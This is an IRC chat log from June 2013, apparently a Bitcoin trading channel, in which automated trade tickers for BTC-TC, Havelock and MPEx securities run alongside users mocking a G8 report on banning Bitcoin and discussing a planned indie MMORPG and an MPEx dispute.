[HAVELOCK] [ASICM] 2 @ 0.03389899 = 0.0678 BTC [-] Jun 27 17:05:58 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 17:06:07 [BTCTC] [AMC-PT] 67 @ 0.0025 = 0.1675 BTC [-] Jun 27 17:07:55 [BTCTC] [AMC-PT] 2500 @ 0.0025 = 6.25 BTC [-] Jun 27 17:08:47 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 17:08:55 [BTCTC] [AMC-PT] 8000 @ 0.0025 = 20 BTC [-] Jun 27 17:09:49 [BTCTC] [AMC-PT] 114 @ 0.0025 = 0.285 BTC [-] Jun 27 17:09:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.033602 = 0.0672 BTC [+] Jun 27 17:09:53 [BTCTC] [AMC-PT] 2002 @ 0.0025 = 5.005 BTC [-] Jun 27 17:10:38 [BTCTC] [TAT.ASICMINER] 8 @ 0.03355 = 0.2684 BTC [-] Jun 27 17:10:58 [BTCTC] [COGNITIVE] 1 @ 0.529999 BTC [-] Jun 27 17:11:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.033602 = 0.336 BTC [+] Jun 27 17:11:14 [BTCTC] [TAT.ASICMINER] 90 @ 0.03349 = 3.0141 BTC [-] Jun 27 17:11:50 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [-] Jun 27 17:11:52 [BTCTC] [TAT.ASICMINER] 100 @ 0.03349 = 3.349 BTC [-] Jun 27 17:12:55 [BTCTC] [PAJKA.BOND] 1 @ 0.068 BTC [+] Jun 27 17:13:00 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jun 27 17:14:36 CIA plan to stop leaks was just... Leaked! Jun 27 17:15:18 http://www.businessinsider.com/the-cia-leaks-to-the-media-2013-6 Jun 27 17:15:22 The CIA Leaks To The Media - Business Insider Jun 27 17:16:01 so they were gonna stop leaks with internal marketing Jun 27 17:16:19 "Honor the Oath" campaign Jun 27 17:16:27 [BTCTC] [AMC-PT] 1333 @ 0.0025 = 3.3325 BTC [-] Jun 27 17:16:48 :D Jun 27 17:16:53 "Brennan says the 'Honor the Oath' campaign is intended to 'reinforce our corporate culture of secrecy' through education and training" Jun 27 17:16:59 corporate culture Jun 27 17:17:14 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jun 27 17:17:17 [BTCTC] [COGNITIVE] 9 @ 0.520001 = 4.68 BTC [-] Jun 27 17:17:52 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [-] Jun 27 17:18:43 [BTCTC] [AMC-PT] 1600 @ 0.0025 = 4 BTC [-] Jun 27 17:20:13 [BTCTC] [ASICMINER-PT] 1 @ 3.376 BTC [+] Jun 27 17:20:14 from a definition of corporate culture: Jun 27 17:20:19 "If you're not happy with your current culture, there are things you can do to start changing it now. Look for a symbol, story, ritual or other tool you could use to bring out the values and practices you want for your company. Your cultural tool might be a new corporate logo symbolizing your company's personality. Or you could choose a story to embody your approach and make it part of Jun 27 17:20:19 your culture. If you can't find a tool, make one. For example, you can turn an admired former employee into a symbol by giving an award named after that individual, complete with ritual ceremony." Jun 27 17:20:25 creepy stuff Jun 27 17:21:04 If you can't find a tool, make one! Jun 27 17:21:10 like a former employee! Jun 27 17:21:16 [BTCTC] [TAT.ASICMINER] 25 @ 0.03349 = 0.8373 BTC [-] Jun 27 17:21:35 sounds like "how to build a cult" Jun 27 17:21:36 in 5 easy steps Jun 27 17:21:36 that Edward was a tool, let's make an example of him Jun 27 17:21:51 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 17:23:31 corporate culture is another oxymoron, trying to create 'value' for employees that doesn't actually requiring paying them. Jun 27 17:24:22 [BTCTC] [COGNITIVE] 9 @ 0.479999 = 4.32 BTC [-] Jun 27 17:24:28 crock of shit. my employer is trying to go 'google-style'.. collaborative spaces, stupid services in the building, health program, all this useless crap. Jun 27 17:24:45 ah well, as long as teh check doesn't bounce. Jun 27 17:24:54 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [-] Jun 27 17:25:50 [BTCTC] [AMC-PT] 701 @ 0.0025 = 1.7525 BTC [-] Jun 27 17:26:06 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004738 BTC [+] Jun 27 17:26:22 [BTCTC] [RSM] 4 @ 0.0218 = 0.0872 BTC [-] Jun 27 17:27:06 [BTCTC] [AMC-PT] 34 @ 0.0025 = 0.085 BTC [-] Jun 27 17:27:15 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 17:27:28 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 17:27:31 [BTCTC] [COGNITIVE] 9 @ 0.510001 = 4.59 BTC [+] Jun 27 17:28:29 [BTCTC] [B.YABMC] 7 @ 0.006021 = 0.0421 BTC [-] Jun 27 17:29:00 [BTCTC] [AMC-PT] 17 @ 0.0025 = 0.0425 BTC [-] Jun 27 17:29:19 [BTCTC] [COGNITIVE] 9 @ 0.469999 = 4.23 BTC [-] Jun 27 17:29:27 [BTCTC] [AMC-PT] 333 @ 0.0025 = 0.8325 BTC [-] Jun 27 17:29:35 [BTCTC] [AMC-PT] 160 @ 0.0025 = 0.4 BTC [-] Jun 27 17:30:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.033491 = 0.1005 BTC [+] Jun 27 17:30:30 [BTCTC] [COGNITIVE] 8 @ 0.510001 = 4.08 BTC [+] Jun 27 17:31:01 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 17:32:58 [BTCTC] [BASIC-MINING] 1 @ 2 BTC [-] Jun 27 17:33:18 [BTCTC] [COGNITIVE] 8 @ 0.459999 = 3.68 BTC [-] Jun 27 17:33:55 [HAVELOCK] [ASICM] 7 @ 0.03389899 = 0.2373 BTC [-] Jun 27 17:34:03 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 17:34:09 [BTCTC] [AMC-PT] 50000 @ 0.0025 = 125 BTC [-] Jun 27 17:34:13 [HAVELOCK] [ASICM] 1 @ 0.03389899 BTC [-] Jun 27 17:36:12 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 17:36:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.034184 BTC [+] Jun 27 17:37:08 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [-] Jun 27 17:39:06 [MPEX] [S.MPOE] 6837 @ 0.00083097 = 5.6813 BTC [+] Jun 27 17:39:36 [BTCTC] [AMC-PT] 2003 @ 0.0025 = 5.0075 BTC [-] Jun 27 17:44:00 [BTCTC] [AMC-PT] 4800 @ 0.0025 = 12 BTC [-] Jun 27 17:44:04 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [-] Jun 27 17:44:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.033491 BTC [-] Jun 27 17:44:12 [BTCTC] [AMC-PT] 275 @ 0.0025 = 0.6875 BTC [-] Jun 27 17:44:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.03349 = 0.1675 BTC [-] Jun 27 17:44:15 [BTCTC] [TAT.ASICMINER] 57 @ 0.033488 = 1.9088 BTC [-] Jun 27 17:44:26 http://www.newsdeskmedia.com/files/G8-UK-2013.pdf Jun 27 17:44:28 old news? Jun 27 17:44:30 [BTCTC] [AMC-PT] 93 @ 0.0025 = 0.2325 BTC [-] Jun 27 17:44:36 The opportunity to act now Jun 27 17:44:36 As highlighted by the latest initiative of the Jun 27 17:44:36 United States to arrest some of the suspects Jun 27 17:44:36 that were involved in Liberty Reserve (a Jun 27 17:44:36 group indicted for money laundering that ran Jun 27 17:44:39 a $6 billion worldwide operation out of Costa Jun 27 17:44:41 Rica), alternative payment mechanisms, such Jun 27 17:44:43 [BTCTC] [BTC-TRADING-PT] 1 @ 0.541 BTC [-] Jun 27 17:44:44 as Bitcoin and a host of others, can enable Jun 27 17:44:46 criminal and terrorist groups to launder Jun 27 17:44:49 money and fund their operations. Jun 27 17:44:51 Governments of the world have the ability Jun 27 17:44:54 right now to ban these payment mechanisms. Jun 27 17:44:56 lol, sorry Jun 27 17:45:37 well they can ban them Jun 27 17:45:44 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [-] Jun 27 17:45:50 doesnt mean they can STOP them necessarily Jun 27 17:46:06 who's that ? Jun 27 17:46:15 [BTCTC] [TAT.ASICMINER] 16 @ 0.0334 = 0.5344 BTC [-] Jun 27 17:46:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0334 BTC [-] Jun 27 17:46:37 G8 Jun 27 17:46:40 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jun 27 17:47:09 If treasuries and financial institutions Jun 27 17:47:09 around the world were to block those Jun 27 17:47:09 transactions and permit only legitimate Jun 27 17:47:09 currencies to be used on the internet through regulated payment service providers and Jun 27 17:47:09 cards (such as Visa, MasterCard and American Jun 27 17:47:10 Express), then the flow of many billions of Jun 27 17:47:10 dollars to criminal groups would be stemmed Jun 27 17:47:11 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 17:47:14 ... Jun 27 17:47:30 but what would they do about all the evils fiat is used for? Jun 27 17:47:33 stem that too? Jun 27 17:47:48 no, they can tax that. Jun 27 17:47:54 oh geez it gets worse Jun 27 17:47:59 lmao g8 ?! Jun 27 17:48:00 ahahaha Jun 27 17:48:07 Furthermore, if those same countries Jun 27 17:48:07 introduced, if necessary, additional legislation Jun 27 17:48:08 to confiscate the proceeds of such online Jun 27 17:48:08 crime, these funds could be either returned Jun 27 17:48:08 pg 60 is fun Jun 27 17:48:10 cool. Jun 27 17:48:14 to those who had been defrauded or Jun 27 17:48:14 used to fund international projects that Jun 27 17:48:14 could bring about a more safe and secure Jun 27 17:48:14 internet environment for all citizens. Jun 27 17:48:20 so it's war. fine. Jun 27 17:48:45 like every line gets worse Jun 27 17:48:54 If the leaders of the European Union and Jun 27 17:48:54 United States could be convinced to take a Jun 27 17:48:54 lead on these initiatives, that would be a huge Jun 27 17:48:54 contribution to making the internet a safe Jun 27 17:48:54 place for financial transactions. At the same Jun 27 17:48:55 time, it would also strike a blow against those Jun 27 17:48:55 who would try to destroy the fabric of our the Jun 27 17:48:56 world’s well-being Jun 27 17:49:15 why the fuck is it EU and US's job?! Jun 27 17:49:31 [BTCTC] [COGNITIVE] 7 @ 0.510001 = 3.57 BTC [+] Jun 27 17:49:47 lol Jun 27 17:49:48 The International Cyber Security Jun 27 17:49:48 what well-being? Jun 27 17:49:48 Protection Alliance stands ready to work Jun 27 17:49:48 with governments interested in taking these Jun 27 17:49:48 hugely cost-effective and sensible measures. Jun 27 17:50:11 it's hugely cost-effective and sensible Mr USA, DO IT! Jun 27 17:50:15 [BTCTC] [COGNITIVE] 2 @ 0.529999 = 1.06 BTC [+] Jun 27 17:50:52 [BTCTC] [COGNITIVE] 1 @ 0.47 BTC [-] Jun 27 17:51:31 damn Jun 27 17:51:45 and we are talking about forum sockpuppets Jun 27 17:51:56 when obviouly, there are much major ones Jun 27 17:52:28 [BTCTC] [COGNITIVE] 5 @ 0.489999 = 2.45 BTC [+] Jun 27 17:52:42 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [-] Jun 27 17:52:48 [BTCTC] [TAT.ASICMINER] 16 @ 0.0334 = 0.5344 BTC [-] Jun 27 17:52:50 [BTCTC] [TAT.ASICMINER] 14 @ 0.0334 = 0.4676 BTC [-] Jun 27 17:52:59 the text is insulting to pretty much anyone that reads it Jun 27 17:53:14 yes, obviouly the well-being of some fortunes... Jun 27 17:53:35 obviously* Jun 27 17:53:46 lolwut Jun 27 17:53:46 so orwellian Jun 27 17:54:15 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [-] Jun 27 17:54:19 gasenwagen is coming. Jun 27 17:54:20 [BTCTC] [COGNITIVE] 7 @ 0.510001 = 3.57 BTC [+] Jun 27 17:54:35 [BTCTC] [AMC-PT] 1066 @ 0.0025 = 2.665 BTC [-] Jun 27 17:54:55 [BTCTC] [ASICMINER-PT] 5 @ 3.3761 = 16.8805 BTC [+] Jun 27 17:54:57 [BTCTC] [ASICMINER-PT] 1 @ 3.376 BTC [-] Jun 27 17:55:16 meanwhile Jun 27 17:55:20 "Anyone anticipating a price correction on ASICMINER today with speculators snacking up AMC shares like hotcakes on BitFunder and BTC-TC? I have to admit I moved a bit that way, I don't want to miss out the next chance to get in early on something potentially big. Might be a nice day to sell some G-ASICMINER PUT's on BitFunder" Jun 27 17:55:23 [BTCTC] [COGNITIVE] 7 @ 0.469999 = 3.29 BTC [-] Jun 27 17:55:24 [BTCTC] [BITVPS] 5 @ 0.000931 = 0.0047 BTC [-] Jun 27 17:55:29 Yussssss! Jun 27 17:56:00 [BTCTC] [ASICMINER-PT] 6 @ 3.409799 = 20.4588 BTC [+] Jun 27 17:56:06 [BTCTC] [AMC-PT] 60 @ 0.0025 = 0.15 BTC [-] Jun 27 17:56:47 hehehe Jun 27 17:57:08 [BTCTC] [AMC-PT] 8000 @ 0.0025 = 20 BTC [-] Jun 27 17:57:19 [BTCTC] [COGNITIVE] 15 @ 0.510001 = 7.65 BTC [+] Jun 27 17:58:08 ฿2063 48h volume on BF Jun 27 17:58:23 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 17:58:24 [BTCTC] [COGNITIVE] 15 @ 0.469999 = 7.05 BTC [-] Jun 27 17:58:51 well how is the price supposed to rise if we don't buy up these ask walls? Jun 27 17:58:58 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 17:58:58 [HAVELOCK] [ASICM] 41 @ 0.033899 = 1.3899 BTC [+] Jun 27 17:59:00 [HAVELOCK] [ASICM] 23 @ 0.033899 = 0.7797 BTC [+] Jun 27 17:59:03 munchmunch Jun 27 17:59:14 http://techcrunch.com/2013/06/26/with-new-initiative-galactic-paypal-wants-to-own-payments-and-commerce-in-space/ Jun 27 17:59:17 With New Initiative ‘Galactic,’ PayPal Wants To Own Payments And Commerce In Space | TechCrunc Jun 27 17:59:29 holding my amc shares Jun 27 18:00:30 let's see how much time those ask walls last :) Jun 27 18:01:51 [BTCTC] [ASICMINER-PT] 20 @ 3.4097 = 68.194 BTC [-] Jun 27 18:02:14 [BTCTC] [AMC-PT] 71 @ 0.0025 = 0.1775 BTC [-] Jun 27 18:02:55 [BTCTC] [ASICMINER-PT] 1 @ 3.4097 BTC [-] Jun 27 18:02:58 How to Be a Bitcoin Investor Jun 27 18:02:58 1. Check dividend yields on every stock you can find. Buy the best ones Jun 27 18:02:58 2. Don't miss out on the next big thing, you'll feel sad if you do. Jun 27 18:02:58 3. Only listen to advice of people that agree with you, everyone else is just mean anyway. Jun 27 18:02:58 4. Believe the hype, we are the new wealthy elite, gentleman! Jun 27 18:02:58 5. When price is rising on any stock, buy faster! Jun 27 18:02:58 6. When price falls, consult the crowd to determine who did this to you (probably one of those meanies). Jun 27 18:02:59 7. Trust everyone, what choice do you have anyway! Jun 27 18:03:04 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [-] Jun 27 18:03:23 hahaha Jun 27 18:03:30 who wrote this? Jun 27 18:03:33 me Jun 27 18:03:35 just now Jun 27 18:03:40 nice Jun 27 18:03:54 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 18:04:25 hehehe Jun 27 18:04:51 [BTCTC] [ASICMINER-PT] 1 @ 3.4098 BTC [+] Jun 27 18:04:53 [BTCTC] [ASICMINER-PT] 5 @ 3.41 = 17.05 BTC [+] Jun 27 18:04:55 [BTCTC] [ASICMINER-PT] 3 @ 3.4497 = 10.3491 BTC [+] Jun 27 18:04:57 [BTCTC] [ASICMINER-PT] 6 @ 3.449999 = 20.7 BTC [+] Jun 27 18:05:05 buy faster! Jun 27 18:05:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0053 BTC [+] Jun 27 18:06:07 ok so here's a bunch of stuff from s.mg : Jun 27 18:06:07 http://trilema.com/2013/statements-regarding-the-mmorpg-under-development-i-v/ Jun 27 18:06:10 Statements regarding the MMORPG under development (I - V) pe Trilema - Un blog de Mircea Popescu. Jun 27 18:06:53 [BTCTC] [AMC-PT] 3543 @ 0.0025 = 8.8575 BTC [-] Jun 27 18:07:04 i was reading about dragon's tale earlier Jun 27 18:07:12 looks fun Jun 27 18:07:21 [BTCTC] [ASICMINER-PT] 6 @ 3.375001 = 20.25 BTC [-] Jun 27 18:07:43 "By John Lyons, chief executive, International Cyber Security Protection Alliance" << aka nobody. Jun 27 18:08:18 https://www.icspa.org/media/icspa-news/news-single/article/ransomware-alert-do-not-pay-36/abp/38/ Jun 27 18:08:23 Ransomware Alert - Do Not Pay! Jun 27 18:08:29 their largest claim to fame being that... well... they're being raped on the internet. Jun 27 18:08:29 [BTCTC] [COGNITIVE] 1 @ 0.47 BTC [+] Jun 27 18:08:58 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jun 27 18:09:15 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [-] Jun 27 18:10:20 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jun 27 18:11:31 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [-] Jun 27 18:11:36 [BTCTC] [AMC-PT] 27150 @ 0.0025 = 67.875 BTC [-] Jun 27 18:11:43 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [-] Jun 27 18:12:19 [BTCTC] [AMC-PT] 8000 @ 0.0025 = 20 BTC [-] Jun 27 18:12:30 game sounds cool so far Jun 27 18:13:13 [BTCTC] [AMC-PT] 415 @ 0.0025 = 1.0375 BTC [-] Jun 27 18:13:41 [BTCTC] [AMC-PT] 18 @ 0.0025 = 0.045 BTC [-] Jun 27 18:14:15 "I understand that I will be required to pay 0.3BTC as fees for registering this Jun 27 18:14:15 account, and I agree and promise to do so." Jun 27 18:14:20 [BTCTC] [DMS.PURCHASE] 14 @ 0.053794 = 0.7531 BTC [-] Jun 27 18:14:22 people are getting cleverer by the day. Jun 27 18:14:43 mircea_popescu: it was a great idea to support indies tbh Jun 27 18:14:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.03339 = 0.0668 BTC [-] Jun 27 18:14:54 yeah. Jun 27 18:15:01 they deserve it Jun 27 18:15:04 ideally it'll be all indie all the way for the entire rest of the history. Jun 27 18:15:11 :D Jun 27 18:15:13 [BTCTC] [ASICMINER-PT] 2 @ 3.375001 = 6.75 BTC [-] Jun 27 18:15:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.034161 = 0.1025 BTC [+] Jun 27 18:15:49 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [-] Jun 27 18:15:58 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004614 BTC [-] Jun 27 18:17:20 [BTCTC] [S.MPOE-PT] 1 @ 0.00098 BTC [+] Jun 27 18:17:41 [BTCTC] [ASICMINER-PT] 4 @ 3.4 = 13.6 BTC [+] Jun 27 18:17:51 [BTCTC] [S.MPOE-PT] 1 @ 0.00088 BTC [-] Jun 27 18:18:18 [BTCTC] [S.MPOE-PT] 45 @ 0.00088 = 0.0396 BTC [-] Jun 27 18:18:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.034148 = 0.1024 BTC [-] Jun 27 18:18:57 [BTCTC] [S.MPOE-PT] 1 @ 0.000995 BTC [+] Jun 27 18:19:44 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 18:20:46 I hate these games myself, but if you want to be profitable, just build a HeyDay or Clash of Clans IOS game clone. Making $500,000 US per day. Jun 27 18:21:16 [HAVELOCK] [ASICM] 1 @ 0.0339 BTC [+] Jun 27 18:21:30 mmorpg has way more development and testing -- and it goes on forever. don't build what you want to play, build what makes money. Jun 27 18:21:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.033002 = 0.198 BTC [-] Jun 27 18:21:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.033002 BTC [-] Jun 27 18:21:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.033 = 0.165 BTC [-] Jun 27 18:21:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.033 = 0.33 BTC [-] Jun 27 18:21:58 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 18:22:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.033002 BTC [+] Jun 27 18:22:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.0329 = 0.0987 BTC [-] Jun 27 18:22:46 hehehe. Jun 27 18:22:46 [BTCTC] [TAT.ASICMINER] 23 @ 0.0329 = 0.7567 BTC [-] Jun 27 18:23:04 [BTCTC] [TAT.ASICMINER] 3 @ 0.0329 = 0.0987 BTC [-] Jun 27 18:23:08 you;'re a little late to teh discussion. Jun 27 18:23:25 [BTCTC] [AMC-PT] 84 @ 0.0025 = 0.21 BTC [-] Jun 27 18:23:55 no, I've purposely avoided it Jun 27 18:23:58 [BTCTC] [TAT.ASICMINER] 6 @ 0.033002 = 0.198 BTC [+] Jun 27 18:24:01 i have two requests for the game, which you are of course welcome to ignore Jun 27 18:24:13 can we please bring back totally secret zones Jun 27 18:24:23 like portals in the side of a mountain Jun 27 18:24:30 invisible bridges Jun 27 18:24:33 shit like that Jun 27 18:24:35 yup. Jun 27 18:24:44 sweet Jun 27 18:24:46 and Jun 27 18:24:55 there's an entire skill tree dedicated to finding invisible shit. but i anticipate. Jun 27 18:25:03 can we please bring back truly unique truly random item drops Jun 27 18:25:08 yup. Jun 27 18:25:13 [BTCTC] [AMC-PT] 131 @ 0.0025 = 0.3275 BTC [-] Jun 27 18:25:14 sweet Jun 27 18:25:16 absolutely. Jun 27 18:25:37 in fact the idea is all items will be craftable, and the crafters set up what the fuck they;re making (within some limits) Jun 27 18:25:39 same for spells. Jun 27 18:25:52 http://en.wikipedia.org/wiki/Betrayal_at_Krondor Jun 27 18:25:53 both requests derive from my love fro Final Fantasy 2 (US) Jun 27 18:25:54 that was a good one Jun 27 18:26:02 addictive as hell Jun 27 18:26:06 and solo Jun 27 18:26:06 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [-] Jun 27 18:26:22 i loved how no one even knew some items existed Jun 27 18:26:30 you'd just be grinding and then wtf Jun 27 18:26:36 Crystal Helmet!? Jun 27 18:26:37 exactly the concept. Jun 27 18:26:41 hehe Jun 27 18:26:44 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [-] Jun 27 18:26:46 occulus rift support? Jun 27 18:27:19 no statement on that yet. Jun 27 18:27:26 I hope you are going Unity Jun 27 18:27:32 [BTCTC] [AMC-PT] 17 @ 0.0025 = 0.0425 BTC [-] Jun 27 18:27:39 will save you a lot of dev time Jun 27 18:28:06 UDK and Unity have already built-in rift support :) Jun 27 18:28:06 and then you'd accidentally walk to far in one direction and realize you're in mid-air on the way to some secret treasure, this of course causing you to replay game bumping into every boundary you can find Jun 27 18:28:08 :) Jun 27 18:28:09 nope. unity is proprietary shit i wouldn't touch Jun 27 18:28:29 the only way i'm using proprietary code is if i own the developer. Jun 27 18:28:35 hmm ok Jun 27 18:28:38 [BTCTC] [ASICMINER-PT] 2 @ 3.377201 = 6.7544 BTC [-] Jun 27 18:29:11 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [-] Jun 27 18:30:22 [BTCTC] [AMC-PT] 150 @ 0.0025 = 0.375 BTC [-] Jun 27 18:30:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.033 = 0.099 BTC [-] Jun 27 18:31:27 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [-] Jun 27 18:31:44 anyway, there will be a gamerules announcement, probably before the 15th. Jun 27 18:31:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.033492 = 0.1675 BTC [+] Jun 27 18:31:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.0329 BTC [-] Jun 27 18:32:11 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [-] Jun 27 18:32:15 [BTCTC] [ASICMINER-PT] 3 @ 3.377203 = 10.1316 BTC [+] Jun 27 18:33:00 [BTCTC] [ASICMINER-PT] 1 @ 3.44 BTC [+] Jun 27 18:33:43 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [-] Jun 27 18:34:32 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 18:34:51 [MPEX] [S.MG] 5568 @ 0.00012451 = 0.6933 BTC [+] Jun 27 18:35:04 [MPEX] [S.MG] 10000 @ 0.000125 = 1.25 BTC [+] Jun 27 18:35:21 [MPEX] [S.MG] 10000 @ 0.000129 = 1.29 BTC [+] Jun 27 18:35:39 [MPEX] [S.MG] 10000 @ 0.00013 = 1.3 BTC [+] Jun 27 18:36:17 [HAVELOCK] [HIM] 1 @ 0.2988 BTC [-] Jun 27 18:36:31 [MPEX] [S.MG] 10000 @ 0.000135 = 1.35 BTC [+] Jun 27 18:37:28 [HAVELOCK] [ASICM] 212 @ 0.0339 = 7.1868 BTC [+] Jun 27 18:37:41 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jun 27 18:37:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.033001 BTC [+] Jun 27 18:38:21 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jun 27 18:38:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.033001 BTC [+] Jun 27 18:38:47 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [-] Jun 27 18:39:26 https://bitcointalk.org/index.php?topic=244716.0 Jun 27 18:39:32 Gigamining - The MPEx situation Jun 27 18:40:08 "i don't want to admit i stole everyone's stuff so here's some blabla" ? Jun 27 18:40:18 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [-] Jun 27 18:40:19 [BTCTC] [ASICMINER-PT] 2 @ 3.386 = 6.772 BTC [-] Jun 27 18:40:35 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [-] Jun 27 18:40:59 [BTCTC] [ASICMINER-PT] 6 @ 3.438998 = 20.634 BTC [+] Jun 27 18:41:01 [BTCTC] [ASICMINER-PT] 1 @ 3.439 BTC [+] Jun 27 18:41:03 [BTCTC] [ASICMINER-PT] 1 @ 3.443998 BTC [+] Jun 27 18:41:07 [BTCTC] [ASICMINER-PT] 1 @ 3.444 BTC [+] Jun 27 18:41:09 [BTCTC] [ASICMINER-PT] 1 @ 3.447 BTC [+] Jun 27 18:41:13 [BTCTC] [ASICMINER-PT] 5 @ 3.4481 = 17.2405 BTC [+] Jun 27 18:41:15 [BTCTC] [AMC-PT] 35000 @ 0.0025 = 87.5 BTC [-] Jun 27 18:41:39 [BTCTC] [ASICMINER-PT] 1 @ 3.386 BTC [-] Jun 27 18:41:58 wow, actually yes. Jun 27 18:42:06 I also want to stress that I consider the entire situation with MPEx / Mircea to be my fault for allowing the pass through to run and not making sure the promises made were being kept. Jun 27 18:42:34 ouch lol Jun 27 18:42:35 [BTCTC] [DMS.MINING] 14 @ 0.021989 = 0.3078 BTC [-] Jun 27 18:42:40 [BTCTC] [AMC-PT] 45 @ 0.0025 = 0.1125 BTC [-] Jun 27 18:42:41 [BTCTC] [ASICMINER-PT] 2 @ 3.42 = 6.84 BTC [+] Jun 27 18:43:42 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [-] Jun 27 18:44:11 [BTCTC] [AMC-PT] 1230 @ 0.0025 = 3.075 BTC [-] Jun 27 18:44:44 [BTCTC] [AMC-PT] 190 @ 0.0025 = 0.475 BTC [-] Jun 27 18:44:54 [BTCTC] [AMC-PT] 798 @ 0.0025 = 1.995 BTC [-] Jun 27 18:44:56 [BTCTC] [ASICMINER-PT] 1 @ 3.448101 BTC [+] Jun 27 18:45:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.033001 = 0.099 BTC [+] Jun 27 18:45:01 [BTCTC] [ASICMINER-PT] 3 @ 3.448999 = 10.347 BTC [+] Jun 27 18:45:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Jun 27 18:45:55 [BTCTC] [AMC-PT] 235 @ 0.0025 = 0.5875 BTC [-] Jun 27 18:48:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.032999 BTC [-] Jun 27 18:48:30 [BTCTC] [TAT.ASICMINER] 15 @ 0.033 = 0.495 BTC [+] Jun 27 18:48:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0333 BTC [+] Jun 27 18:48:43 [BTCTC] [AMC-PT] 60 @ 0.0025 = 0.15 BTC [-] Jun 27 18:49:18 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jun 27 18:50:12 [BTCTC] [AMC-PT] 560 @ 0.0025 = 1.4 BTC [-] Jun 27 18:50:34 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jun 27 18:51:53 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [-] Jun 27 18:52:12 [BTCTC] [AMC-PT] 320 @ 0.0025 = 0.8 BTC [-] Jun 27 18:52:27 [BTCTC] [S.DICE-PT] 5 @ 0.002299 = 0.0115 BTC [+] Jun 27 18:52:28 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jun 27 18:52:39 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jun 27 18:52:48 